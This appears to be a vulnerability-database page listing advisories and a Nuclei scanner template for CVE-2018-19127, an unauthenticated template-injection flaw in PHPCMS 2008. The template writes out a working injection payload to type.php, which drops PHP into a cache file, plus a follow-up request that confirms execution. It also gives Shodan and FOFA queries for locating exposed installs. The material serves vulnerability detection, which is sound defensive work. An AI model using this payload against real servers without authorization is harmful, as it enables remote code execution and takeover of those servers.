Lucene search
K

PHPCMS 2008 - Remote Code Execution via Template Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Unauthenticated remote code execution in PHPCMS 2008 via template injection that writes to a PHP template cache file and executes.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-19127
22 Aug 202521:02
circl
CNVD
PHPCMS Code Injection Vulnerability
13 Nov 201800:00
cnvd
Check Point Advisories
PHPCMS 2008 type.php Code Injection (CVE-2018-19127)
27 Mar 201900:00
checkpoint_advisories
CVE
CVE-2018-19127
9 Nov 201812:00
cve
Cvelist
CVE-2018-19127
9 Nov 201812:00
cvelist
NVD
CVE-2018-19127
9 Nov 201812:29
nvd
OSV
CVE-2018-19127
9 Nov 201812:29
osv
Prion
Code injection
9 Nov 201812:29
prion
VulnCheck KEV
VulnCheck KEV: CVE-2018-19127
4 Apr 201900:00
vulncheck_kev
id: CVE-2018-19127

info:
  name: PHPCMS 2008 - Remote Code Execution via Template Injection
  author: tomaquet18
  severity: critical
  description: |
    PHPCMS 2008 suffers from an unauthenticated RCE via template injection in type.php, where attacker-supplied content is written into a PHP template cache file, which is then executable.
  impact: |
    Successful exploitation allows an unauthenticated attacker to achieve remote code execution on the server, potentially taking full control.
  remediation: |
    The vendor is unresponsive and PHPCMS 2008 is no longer maintained. Users are advised to stop using this software or restrict public access to it.
  reference:
    - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
    - https://github.com/advisories/GHSA-p498-q357-m3p7
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19127
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19127
    epss-score: 0.20766
    epss-percentile: 0.97228
    cwe-id: CWE-94
    cpe: cpe:2.3:a:phpcms:phpcms:2008:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Powered by phpcms"
    fofa-query: body="Powered by phpcms"
    vendor: phpcms
    product: phpcms-2008
  tags: cve,cve2018,phpcms,rce,ssti,vkev,vuln

flow: http(1) || http(2)

variables:
  num: "999999999"
  payload: "tag_(){};echo(md5({{num}}));{//../rss"

http:
  - method: GET
    path:
      - "{{BaseURL}}/type.php?template={{payload}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "value=\"picture", "phpcms", "{{md5(num)}}")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/data/cache_template/rss.tpl.php"

    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
# digest: 490a00463044022031e2bcd2694b2962d1a829b27da35526068d87970b1a48554dcd3c9b8e3c204302202b213df81b1cde212cabf8df50ef8568af668cc5db86e8ea8f551bebf2fe17ed:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 39.8
EPSS0.20766
15